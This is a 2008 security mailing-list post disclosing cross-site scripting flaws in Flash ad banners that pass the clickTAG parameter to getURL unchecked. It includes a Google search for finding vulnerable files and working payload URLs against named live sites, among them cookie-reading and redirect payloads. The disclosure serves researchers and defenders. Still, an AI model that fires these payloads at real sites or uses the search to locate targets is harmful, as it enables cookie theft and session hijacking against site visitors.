[WEB SECURITY] XSS vulnerabilities in 215000 flash files

MustLive mustlive at websecurity.com.ua
Thu Nov 27 13:22:46 EST 2008


Hello to Web Security Mailing List!

It's my first letter to the list and I decided to inform community about my 
interesting finding.

Recently, 12th of November 2008, I found XSS vulnerabilities in 215000 flash 
files. As I wrote about at my site http://websecurity.com.ua/2609/ (on 
Ukrainian), and this is English version of my article.

During my researches of vulnerability at cpmstar.com 
(http://websecurity.com.ua/2607/) which I found at 19.01.2008, I found that 
in Internet there are many flash files with the same vulnerability. In total 
there are up to 215000 flash files in Internet which are vulnerable to 
Cross-Site Scripting (at more than 200000 sites).

It's seen from data of Google:

http://www.google.com.ua/search?q=filetype%3Aswf+inurl%3AclickTAG (note: for 
current time Google shows other number, which is common for it)

And these are only those flashes, which were indexed by Google, and actually 
there can be much more of them. In results there are site with non 
vulnerable flash files (or sites which not have mentioned flashes already), 
but this is single instances, and almost all sites in search results of 
Google are vulnerable. Besides, last year I wrote already, that 500000 flash 
files at popular sites are vulnerable to XSS 
(http://websecurity.com.ua/1689/).

XSS:

Vulnerability in the next AS code:

getURL(_root.clickTAG, "_blank");

Attack occurs via passing of XSS code to flash file in parameter clickTAG:

http://site/flash.swf?clickTAG=javascript:alert('XSS')

After click on flash the transfer to function occurs of getURL string, which 
passed to flash via parameter clickTAG. Thus can be executed JS code, which 
was passed to flash.

At http://server.cpmstar.com:

http://server.cpmstar.com/cached/creatives/1499_728_90_games.swf?clickTAG=javascript:alert('XSS')

Note, that flashes with target = “_blank” (in getURL) not allow to get to 
cookies. And they also not work in IE6. If target set to not “_blank” (or 
not set at all), then flashes give possibility to get to cookies in all 
browsers (and they work in IE6).

Here are another examples of vulnerable flashes at three sites:

At http://www.banjohangout.org:

http://www.banjohangout.org/img/ads/fitch2b.swf?clickTAG=javascript:alert('XSS')

At http://ad1.emediate.dk:

http://ad1.emediate.dk/media.1/165/2861/15816/HP_Workstation_300x250-clickTAG.swf?clickTAG=javascript:alert('XSS')

At http://www.open4smart.eu:

http://www.open4smart.eu/sitesimages/artclbanners/468x60.swf?clickTAG=javascript:alert('XSS')

There are similar flashes, which are using variable clickTAG, with the next 
AS code:

getURL(_root.clickTAG, _root.TargetAS);

Attack occurs with using of variables clickTAG and TargetAS:

http://site/flash.swf?clickTAG=javascript:alert('XSS')&TargetAS=

At http://www.adspeed.com:

http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert('XSS')&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert(document.cookie)&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:document.location%3D'http://websecurity.com.ua'&TargetAS=

This allows to get to cookies in all browsers and attack normally works in 
IE.

These XSS - it's strictly social XSS, which I mentioned already concerning 
vulnerability at craigslist.org (http://websecurity.com.ua/2206/). First 
time this type of XSS holes I introduced last year with Cross-Site Scripting 
in Mozilla and Firefox (http://websecurity.com.ua/1413/). I'll write in 
detail about this class of vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list